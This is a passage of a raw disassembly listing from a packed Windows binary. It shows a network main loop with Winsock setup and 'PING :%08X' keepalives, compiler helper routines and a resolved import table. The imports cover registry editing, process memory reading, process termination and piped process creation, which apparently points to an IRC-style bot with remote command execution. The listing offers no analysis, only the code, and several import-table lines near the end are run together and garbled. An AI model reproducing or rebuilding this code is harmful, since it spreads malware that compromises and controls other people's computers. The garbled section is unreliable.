push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_12F4], eax
jmp short loc_416983
; ---------------------------------------------------------------------------
loc_416976: ; CODE XREF: sub_4167F1:loc_4169DF�j
mov eax, [ebp+var_12F4]
dec eax
mov [ebp+var_12F4], eax
loc_416983: ; CODE XREF: sub_4167F1+183�j
cmp [ebp+var_12F4], 0
jnz short loc_41699F
push offset byte_41DE30
push offset dword_41EB2C
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_4169E1
; ---------------------------------------------------------------------------
loc_41699F: ; CODE XREF: sub_4167F1+199�j
mov eax, [ebp+var_12F4]
movsx eax, [ebp+eax+var_1121]
cmp eax, 5Ch
jnz short loc_4169DF
mov eax, [ebp+var_12F4]
lea eax, [ebp+eax+var_1120]
push eax
push offset dword_41EB2C
call sub_416B3A ; strcpy
pop ecx
pop ecx
push offset dword_41EB2C
push offset dword_41EC40
call sub_416B3A ; strcpy
pop ecx
pop ecx
jmp short loc_4169E1
; ---------------------------------------------------------------------------
loc_4169DF: ; CODE XREF: sub_4167F1+1BF�j
jmp short loc_416976
; ---------------------------------------------------------------------------
loc_4169E1: ; CODE XREF: sub_4167F1+16B�j
; sub_4167F1+1AC�j ...
call sub_406E8E
lea eax, [ebp+var_12EC]
push eax
push 202h
call dword_417264 ; WSAStartup
loc_4169F8: ; CODE XREF: sub_4167F1+252�j
; sub_4167F1+2B6�j
push 0
push 0
push 0
call sub_40D366
add esp, 0Ch
call sub_409226
and dword ptr [ebp-1124h], 0
and [ebp+var_101C], 0
loc_416A19: ; CODE XREF: .packed:00416AE2�j
mov [ebp+var_4], 1
loc_416A20: ; CODE XREF: sub_4167F1:loc_416A6F�j
; sub_4167F1+2CF�j
push 0EA60h
call sub_40CF25
push eax
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_416A71
cmp [ebp+var_101C], 19h
jnz short loc_416A45
and [ebp+var_4], 0
jmp short loc_4169F8
; ---------------------------------------------------------------------------
loc_416A45: ; CODE XREF: sub_4167F1+24C�j
cmp [ebp+var_101C], 14h
jnz short loc_416A62
call sub_410422
push eax
push offset aPing08x ; "PING :%08X"
call sub_40D6CB
pop ecx
pop ecx
jmp short loc_416A6F
; ---------------------------------------------------------------------------
loc_416A62: ; CODE XREF: sub_4167F1+25B�j
mov eax, [ebp+var_101C]
inc eax
mov [ebp+var_101C], eax
loc_416A6F: ; CODE XREF: sub_4167F1+26F�j
jmp short loc_416A20
; ---------------------------------------------------------------------------
loc_416A71: ; CODE XREF: sub_4167F1+243�j
push 1000h
lea eax, [ebp+var_1018]
push eax
call sub_40CF25
push eax
call sub_4053DC
add esp, 0Ch
mov [ebp-1124h], eax
cmp dword ptr [ebp-1124h], 0
jz short loc_416AA3
cmp dword ptr [ebp-1124h], 0FFFFFFFFh
jnz short loc_416AAC
loc_416AA3: ; CODE XREF: sub_4167F1+2A7�j
and [ebp+var_4], 0
jmp loc_4169F8
; ---------------------------------------------------------------------------
loc_416AAC: ; CODE XREF: sub_4167F1+2B0�j
and [ebp+var_101C], 0
lea eax, [ebp+var_1018]
push eax
call sub_40E943
pop ecx
jmp loc_416A20
sub_4167F1 endp
; ---------------------------------------------------------------------------
push offset aLoop ; "loop"
push offset aMain ; "main"
push dword ptr [ebp-14h]
call sub_40332B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
and dword ptr [ebp-4], 0
jmp loc_416A19
; ---------------------------------------------------------------------------
push offset aEntry ; "entry"
push offset aMain ; "main"
push dword ptr [ebp-14h]
call sub_40332B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
or dword ptr [ebp-4], 0FFFFFFFFh
cmp dword_41DE38, 0
jz short loc_416B1E
push offset dword_41DD54
push offset dword_41DAB4
call sub_40D4AB
pop ecx
pop ecx
loc_416B1E: ; CODE XREF: .packed:00416B0B�j
call dword_417254 ; WSACleanup
push 0
call sub_416BFC ; exit
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B3A proc near ; CODE XREF: sub_401000+3C�p
; sub_4020C2+62�p ...
jmp dword_41712C
sub_416B3A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B40 proc near ; CODE XREF: sub_401146+7A�p
; sub_4017AA+E�p ...
jmp dword_4171BC
sub_416B40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B46 proc near ; CODE XREF: sub_401244+85�p
; sub_4017AA+22�p ...
jmp dword_4171B8
sub_416B46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B4C proc near ; CODE XREF: sub_401244+25�p
; sub_401244+4DE�p ...
jmp dword_4171B4
sub_416B4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B52 proc near ; CODE XREF: sub_401244+1A�p
; sub_401981+18�p ...
jmp dword_4171B0
sub_416B52 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B58 proc near ; CODE XREF: sub_4017AA+5A�p
; sub_4024F3+88�p ...
jmp dword_4171AC
sub_416B58 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B5E proc near ; CODE XREF: sub_4018AF+9F�p
; sub_4055E5+231�p ...
jmp dword_4171A8
sub_416B5E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B64 proc near ; CODE XREF: sub_4018AF+3B�p
; sub_4018AF+5D�p ...
jmp dword_4171A4
sub_416B64 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B6A proc near ; CODE XREF: sub_401981+145�p
; sub_401981+158�p ...
jmp dword_4171A0
sub_416B6A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B70 proc near ; CODE XREF: sub_401D6E+A5�p
; sub_403260+4C�p ...
jmp dword_41719C
sub_416B70 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B76 proc near ; CODE XREF: sub_401E38+1AB�p
; sub_4020C2+1A6�p ...
jmp dword_417198
sub_416B76 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B7C proc near ; CODE XREF: sub_401E38+179�p
; sub_402698+24C�p ...
jmp dword_417194
sub_416B7C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B82 proc near ; CODE XREF: sub_401E38+9D�p
; sub_401E38+262�p ...
jmp dword_417190
sub_416B82 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B88 proc near ; CODE XREF: sub_401E38+42�p
; sub_4020C2+159�p ...
jmp dword_41718C
sub_416B88 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B90 proc near ; CODE XREF: sub_4020C2+2C1�p
; sub_41102F+94�p ...
jmp dword_417188
sub_416B90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B96 proc near ; CODE XREF: sub_4020C2+198�p
; sub_4020C2+1BC�p ...
jmp dword_417184
sub_416B96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B9C proc near ; CODE XREF: sub_4024F3+26�p
; sub_4024F3+46�p ...
jmp dword_417180
sub_416B9C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BA2 proc near ; CODE XREF: sub_402698+160�p
; sub_40CA29+F6�p ...
jmp dword_41717C
sub_416BA2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BA8 proc near ; CODE XREF: sub_402698+CC�p
; sub_402698+110�p ...
jmp dword_417178
sub_416BA8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BAE proc near ; CODE XREF: sub_402698+4B�p
; sub_4083AD+3DF�p ...
jmp dword_417174
sub_416BAE endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416BC0 proc near ; CODE XREF: sub_403DF3+8�p
; sub_40546E+8�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_416BE0
loc_416BCC: ; CODE XREF: sub_416BC0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_416BCC
loc_416BE0: ; CODE XREF: sub_416BC0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_416BC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BF0 proc near ; CODE XREF: sub_4041B7+D�p
; sub_4041B7+28�p ...
jmp dword_417170
sub_416BF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BF6 proc near ; CODE XREF: sub_406041+67�p
jmp dword_41716C
sub_416BF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BFC proc near ; CODE XREF: sub_406E8E+2B3�p
; .packed:00416B26�p
jmp dword_417168
sub_416BFC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416C10 proc near ; CODE XREF: sub_40821B+61�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_416C31
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov eax, [esp+4+arg_0]
div ecx
mov eax, edx
xor edx, edx
jmp short loc_416C81
; ---------------------------------------------------------------------------
loc_416C31: ; CODE XREF: sub_416C10+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_416C3F: ; CODE XREF: sub_416C10+39�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_416C3F
div ebx
mov ecx, eax
mul [esp+4+arg_C]
xchg eax, ecx
mul [esp+4+arg_8]
add edx, ecx
jb short loc_416C6A
cmp edx, [esp+4+arg_4]
ja short loc_416C6A
jb short loc_416C72
cmp eax, [esp+4+arg_0]
jbe short loc_416C72
loc_416C6A: ; CODE XREF: sub_416C10+4A�j
; sub_416C10+50�j
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_416C72: ; CODE XREF: sub_416C10+52�j
; sub_416C10+58�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
loc_416C81: ; CODE XREF: sub_416C10+1F�j
pop ebx
retn 10h
sub_416C10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416C90 proc near ; CODE XREF: sub_40821B+30�p
; sub_40821B+3B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_416CB2
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_416CF3
; ---------------------------------------------------------------------------
loc_416CB2: ; CODE XREF: sub_416C90+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_416CC0: ; CODE XREF: sub_416C90+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_416CC0
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_416CEE
cmp edx, [esp+8+arg_4]
ja short loc_416CEE
jb short loc_416CEF
cmp eax, [esp+8+arg_0]
jbe short loc_416CEF
loc_416CEE: ; CODE XREF: sub_416C90+4E�j
; sub_416C90+54�j
dec esi
loc_416CEF: ; CODE XREF: sub_416C90+56�j
; sub_416C90+5C�j
xor edx, edx
mov eax, esi
loc_416CF3: ; CODE XREF: sub_416C90+20�j
pop esi
pop ebx
retn 10h
sub_416C90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416CF8 proc near ; CODE XREF: sub_4088FC+1FA�p
; sub_409226+5C�p ...
jmp dword_417164
sub_416CF8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416CFE proc near ; CODE XREF: sub_409226+55�p
; sub_4092A4+55�p ...
jmp dword_417160
sub_416CFE endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416D10 proc near ; CODE XREF: sub_409226+42�p
; sub_4092A4+42�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_416D31
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_416D31: ; CODE XREF: sub_416D10+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_416D4D
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_416D4D: ; CODE XREF: sub_416D10+27�j
or eax, eax
jnz short loc_416D69
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_416DAA
; ---------------------------------------------------------------------------
loc_416D69: ; CODE XREF: sub_416D10+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_416D77: ; CODE XREF: sub_416D10+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_416D77
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_416DA5
cmp edx, [esp+0Ch+arg_4]
ja short loc_416DA5
jb short loc_416DA6
cmp eax, [esp+0Ch+arg_0]
jbe short loc_416DA6
loc_416DA5: ; CODE XREF: sub_416D10+85�j
; sub_416D10+8B�j
dec esi
loc_416DA6: ; CODE XREF: sub_416D10+8D�j
; sub_416D10+93�j
xor edx, edx
mov eax, esi
loc_416DAA: ; CODE XREF: sub_416D10+57�j
dec edi
jnz short loc_416DB4
neg edx
neg eax
sbb edx, 0
loc_416DB4: ; CODE XREF: sub_416D10+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_416D10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DBA proc near ; DATA XREF: sub_4093B6+A�o
; sub_4094E6+A�o ...
jmp dword_41715C
sub_416DBA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DC0 proc near ; CODE XREF: sub_409479+41�p
; sub_4095A4+162�p
jmp dword_417158
sub_416DC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DC6 proc near ; CODE XREF: sub_4095A4+11B�p
jmp dword_417154
sub_416DC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DCC proc near ; CODE XREF: sub_409CB1+105�p
; sub_409CB1+114�p ...
jmp dword_417150
sub_416DCC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DD2 proc near ; CODE XREF: sub_409CB1+42�p
; sub_409CB1+88�p
jmp dword_41714C
sub_416DD2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DD8 proc near ; CODE XREF: sub_409CB1+1A�p
; sub_409DD0+13B�p
jmp dword_417148
sub_416DD8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DDE proc near ; CODE XREF: sub_40A2D2+13E�p
; sub_40A9CF+1F6�p ...
jmp dword_417144
sub_416DDE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DE4 proc near ; CODE XREF: sub_40A8AD+90�p
jmp dword_417140
sub_416DE4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DEA proc near ; CODE XREF: sub_40A9CF+185C�p
jmp dword_41713C
sub_416DEA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DF0 proc near ; CODE XREF: sub_40D420+47�p
; sub_40D4AB+50�p ...
jmp dword_417138
sub_416DF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DF6 proc near ; CODE XREF: sub_40EF59+6B�p
; sub_40EF59+C1�p
jmp dword_417134
sub_416DF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DFC proc near ; CODE XREF: sub_40F040+52�p
; sub_40F040+A8�p
jmp dword_417130
sub_416DFC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416E02 proc near ; CODE XREF: sub_40F040+1E�p
jmp dword_417128
sub_416E02 endp
; ---------------------------------------------------------------------------
loc_416E08: ; CODE XREF: .packed:00416FE2�j
jmp dword_417124
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416E10 proc near ; CODE XREF: sub_414EF4+5�p
push 0FFFFFFFFh
push eax
mov eax, large fs:0
push eax
mov eax, [esp+0Ch]
mov large fs:0, esp
mov [esp+0Ch], ebp
lea ebp, [esp+0Ch]
push eax
retn
sub_416E10 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416E30 proc near ; CODE XREF: sub_4048EF+4E�p
; sub_4048EF+2CF�p ...
jmp dword_4171F8
sub_416E30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416E40 proc near ; CODE XREF: sub_414EF4+EA�p
; sub_414EF4+1E2�p ...
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_416EAF
retn 4
sub_416E40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416E4E proc near ; CODE XREF: sub_414EF4+134�p
; sub_414EF4+2D8�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
and [ebp+var_4], 0
test eax, eax
jz short loc_416EA0
mov ecx, [eax]
lea edx, [ebp+arg_4]
push edx
push offset dword_41DDD0
push eax
call dword ptr [ecx]
test eax, eax
jl short loc_416EA0
mov eax, [ebp+arg_4]
push esi
push [ebp+arg_8]
mov ecx, [eax]
push eax
call dword ptr [ecx+0Ch]
mov esi, eax
mov eax, [ebp+arg_4]
push eax
mov ecx, [eax]
call dword ptr [ecx+8]
test esi, esi
pop esi
jnz short loc_416EA0
lea eax, [ebp+var_4]
push eax
push 0
call dword_4171C8
test eax, eax
jz short loc_416EA0
and [ebp+var_4], 0
loc_416EA0: ; CODE XREF: sub_416E4E+D�j
; sub_416E4E+1F�j ...
push [ebp+var_4]
push [ebp+arg_0]
call sub_416EAF
leave
retn 0Ch
sub_416E4E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416EAF proc near ; CODE XREF: sub_416E40+6�p
; sub_416E4E+58�p
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push 0
lea ecx, [ebp+var_10]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_416ED3
lea eax, [ebp+var_10]
push offset dword_4173B8
push eax
call sub_416FA2 ; _CxxThrowException
sub_416EAF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_416ED3 proc near ; CODE XREF: sub_416EAF+11�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov eax, [esp+arg_0]
push esi
mov esi, ecx
and dword ptr [esi+0Ch], 0
mov [esi+4], eax
mov eax, [esp+4+arg_4]
mov dword ptr [esi], offset dword_4172B4
test eax, eax
mov [esi+8], eax
jz short loc_416EFF
cmp [esp+4+arg_8], 0
jz short loc_416EFF
mov ecx, [eax]
push eax
call dword ptr [ecx+4]
loc_416EFF: ; CODE XREF: sub_416ED3+1D�j
; sub_416ED3+24�j
mov eax, esi
pop esi
retn 0Ch
sub_416ED3 endp
; ---------------------------------------------------------------------------
push esi
mov esi, ecx
call sub_416F4E
test byte ptr [esp+8], 1
jz short loc_416F1B
push esi
call sub_416DCC
pop ecx
loc_416F1B: ; CODE XREF: .packed:00416F12�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
mov eax, [esp+4]
push esi
mov esi, ecx
mov ecx, [eax+4]
mov [esi+4], ecx
mov eax, [eax+8]
and dword ptr [esi+0Ch], 0
mov [esi+8], eax
test eax, eax
mov dword ptr [esi], offset dword_4172B4
jz short loc_416F48
mov ecx, [eax]
push eax
call dword ptr [ecx+4]
loc_416F48: ; CODE XREF: .packed:00416F40�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_416F4E proc near ; CODE XREF: .packed:00416F08�p
push esi
mov esi, ecx
mov eax, [esi+8]
mov dword ptr [esi], offset dword_4172B4
test eax, eax
jz short loc_416F64
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_416F64: ; CODE XREF: sub_416F4E+E�j
mov esi, [esi+0Ch]
test esi, esi
jz short loc_416F72
push esi
call dword_4170B0 ; LocalFree
loc_416F72: ; CODE XREF: sub_416F4E+1B�j
pop esi
retn
sub_416F4E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416F74 proc near ; CODE XREF: sub_401244+120�p
; sub_406E8E+DA�p ...
jmp dword_4171C0
sub_416F74 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416F7A proc near ; CODE XREF: sub_4020C2+113�p
; sub_4038BA+22F�p ...
jmp dword_417114
sub_416F7A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416F80 proc near ; CODE XREF: sub_402A32+CC�p
; sub_402A32+2B9�p ...
jmp dword_417118
sub_416F80 endp
; ---------------------------------------------------------------------------
push esi
mov esi, ecx
call sub_416FA8
test byte ptr [esp+8], 1
jz short loc_416F9C
push esi
call sub_416DCC
pop ecx
loc_416F9C: ; CODE XREF: .packed:00416F93�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416FA2 proc near ; CODE XREF: sub_416EAF+1F�p
jmp dword_41711C
sub_416FA2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416FA8 proc near ; CODE XREF: .packed:00416F89�p
jmp dword_417120
sub_416FA8 endp
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-0A00h]
call sub_415B3F
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-10h]
call sub_415B3F
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-0DF8h]
call sub_415B3F
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-0E14h]
call sub_415B3F
retn
; ---------------------------------------------------------------------------
loc_416FDD: ; DATA XREF: sub_414EF4�o
mov eax, offset dword_417350
jmp loc_416E08
; ---------------------------------------------------------------------------
align 4
dd 6 dup(0)
dword_417000 dd 77DECF4Ah ; resolved to->ADVAPI32.RegEnumValueA ; start_0-11CF6�o
dword_417004 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueA ; sub_406C51+96�r
dword_417008 dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_406722+184�r ...
dword_41700C dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExA ; sub_4083AD+2DD�r ...
dword_417010 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_417014 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_417018 dd 77DFD4C9h ; resolved to->ADVAPI32.GetUserNameAdword_41701C dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_417020 dd 77DE5244h ; resolved to->ADVAPI32.CryptGenRandom ; sub_4102AE+37�r ...
dword_417024 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_417028 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_406722+2F9�r ...
align 10h
dword_417030 dd 7C812ADEh ; resolved to->KERNEL32.GetVersionExA ; sub_40D043+20B�r ...
dword_417034 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoA ; sub_408342+4B�r
dword_417038 dd 7C8360DDh ; resolved to->KERNEL32.SetCurrentDirectoryAdword_41703C dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_414EF4+8EE�r
dword_417040 dd 7C821363h ; resolved to->KERNEL32.GetWindowsDirectoryAdword_417044 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_406B81+95�r ...
dword_417048 dd 7C831C45h ; resolved to->KERNEL32.GetFileTimedword_41704C dd 7C831CB8h ; resolved to->KERNEL32.SetFileTimedword_417050 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_406AE7+15�r ...
dword_417054 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_403BD3+32�r ...
dword_417058 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_403BD3+4D�r ...
dword_41705C dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_407148+18B�r ...
dword_417060 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileA ; sub_406E8E+1FE�r
dword_417064 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Error ; sub_409CB1+CF�r ...
dword_417068 dd 7C810D87h ; resolved to->KERNEL32.WriteFile ; sub_406D90+D3�r
dword_41706C dd 7C8217EAh ; resolved to->KERNEL32.SearchPathAdword_417070 dd 7C81E0C7h ; resolved to->KERNEL32.CreatePipe ; sub_401981+D7�r
dword_417074 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcess ; sub_401981+111�r
dword_417078 dd 7C8216A4h ; resolved to->KERNEL32.GetComputerNameAdword_41707C dd 7C802367h ; resolved to->KERNEL32.CreateProcessA ; sub_406E8E+2A5�r
dword_417080 dd 7C85F90Fh ; resolved to->KERNEL32.PeekNamedPipedword_417084 dd 7C81AE17h ; resolved to->KERNEL32.GetExitCodeProcessdword_417088 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_41708C dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; sub_40332B+1D0�r ...
dword_417090 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA ; sub_40332B+1D7�r ...
dword_417094 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_406041+193�r ...
dword_417098 dd 7C8021CCh ; resolved to->KERNEL32.ReadProcessMemory ; sub_406509+91�r
dword_41709C dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_401244+4F4�r ...
dword_4170A0 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcess ; sub_406643+3B�r
dword_4170A4 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_401244+4C1�r ...
dword_4170A8 dd 7C812782h ; resolved to->KERNEL32.SetFileAttributesA ; sub_406E8E+22A�r ...
dword_4170AC dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_401E38+30�r ...
dword_4170B0 dd 7C80992Fh ; resolved to->KERNEL32.LocalFreedword_4170B4 dd 7C810637h ; resolved to->KERNEL32.CreateThreaddword_4170B8 dd 7C80B974h ; resolved to->KERNEL32.UnmapViewOfFiledword_4170BC dd 7C80B905h ; resolved to->KERNEL32.MapViewOfFiledword_4170C0 dd 7C80945Ch ; resolved to->KERNEL32.CreateFileMappingAdword_4170C4 dd 7C8310F2h ; resolved to->KERNEL32.GlobalMemoryStatusdword_4170C8 dd 7C83039Bh ; resolved to->KERNEL32.GetDiskFreeSpaceExA ; sub_408F2E+134�r
dword_4170CC dd 7C8214E3h ; resolved to->KERNEL32.GetDriveTypeA ; sub_408F2E+7F�r ...
dword_4170D0 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCount ; sub_4092A4:loc_409307�r ...
dword_4170D4 dd 7C82FA46h ; resolved to->KERNEL32.QueryPerformanceFrequency ; sub_4092A4+14�r ...
dword_4170D8 dd 7C80A427h ; resolved to->KERNEL32.QueryPerformanceCounter ; sub_4092A4+A�r ...
dword_4170DC dd 7C80BCCFh ; resolved to->KERNEL32.IsBadCodePtrdword_4170E0 dd 7C81CE03h ; resolved to->KERNEL32.TerminateThread ; sub_4098F3+1B6�r
dword_4170E4 dd 7C809EF1h ; resolved to->KERNEL32.InitializeCriticalSectiondword_4170E8 dd 7C809920h ; resolved to->KERNEL32.GetCurrentProcessId ; sub_406643+19�r
dword_4170EC dd 7C901005h ; resolved to->NTDLL.RtlEnterCriticalSectiondword_4170F0 dd 7C80DDFEh ; resolved to->KERNEL32.DuplicateHandledword_4170F4 dd 7C80AC0Fh ; resolved to->KERNEL32.SetErrorModedword_4170F8 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_4170FC dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_414EF4+5BC�r ...
